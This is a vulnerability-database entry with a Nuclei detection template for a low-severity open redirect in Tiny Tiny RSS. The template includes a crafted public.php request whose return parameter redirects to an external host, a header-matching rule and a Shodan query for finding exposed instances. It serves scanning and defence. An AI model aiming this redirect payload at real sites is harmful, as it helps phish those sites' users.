漏洞描述
Detected an open redirect vulnerability in Tiny Tiny RSS where the return parameter in public.php was abused to redirect users to an attacker-controlled external URL after the authentication flow.
tinytiny-rss-redirect: TinyTiny RSS Open Redirect
PoC代码[已公开]
id: tinytiny-rss-redirect
info:
name: TinyTiny RSS Open Redirect
author: DhiyaneshDk
severity: low
description: |
Detected an open redirect vulnerability in Tiny Tiny RSS where the return parameter in public.php was abused to redirect users to an attacker-controlled external URL after the authentication flow.
reference:
- https://seclists.org/oss-sec/2019/q1/155
metadata:
verified: true
max-request: 1
shodan-query: html:"Tiny Tiny RSS"
tags: redirect,tiny-tiny,rss
http:
- method: GET
path:
- "{{BaseURL}}/public.php?return=http%3a%2f%2finteract.sh%2f&op=login&login=password=&profile=0"
matchers-condition: and
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
- type: status
status:
- 302
- 301
# digest: 4a0a0047304502205e101f757480f1537500ee1e8b2b79b30a764bd0d217a758fae969b8d0c72ea8022100d7f0de8979044374234c4a2cca69fd21a0809959ea493f580dddd461ac3aa0f3:922c64590222798bb761d5b6d8e72950